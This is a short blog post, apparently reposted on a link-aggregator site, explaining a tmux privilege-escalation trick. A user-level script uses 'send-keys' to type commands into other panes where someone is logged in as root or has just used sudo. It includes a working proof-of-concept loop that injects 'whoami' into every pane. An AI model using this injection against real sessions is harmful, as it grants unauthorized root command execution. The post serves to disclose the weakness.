0

tmux Privilege Escalation

 收集于6天前 阅读数 0

tmux privilege escalation abusing send-keys

A script run as user in tmux can under some circumstances execute commands as root.

tl;dr

Did you know you can send keystrokes to other panes in tmux?

You can abuse send-keys to send commands to a root/sudo pane.

That's all there is to it, that's the trick.

send-keys

There's a tmux feature to send keystrokes to a pane.

tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.

man tmux

When I sae the send-keys feature, I was like:

"What if theres another pane, where the user is logged in as root?"

poc||gtfo

preparations

tmux  
tmux sp  
su # login as root

Now go back to the other tmux pane (where you are logged in as user).

action

Now run the following script, to execute whoami in every pane:

#!/bin/sh  
for pane in `tmux list-panes | grep -Po '^\d'`; do  
tmux send-keys -t $pane 'C-c'  
tmux send-keys -t $pane 'whoami  
';  
done;

You will see, as expected, the command whoami returned root.

sudo

With the same trick you can abuse that sudo was used in another pane.

tmux send-keys -t $pane 'sudo whoami  
';

. . /

点击查看更多

猜你喜欢

关于头条


聚合每日国内外有价值,有趣的链接。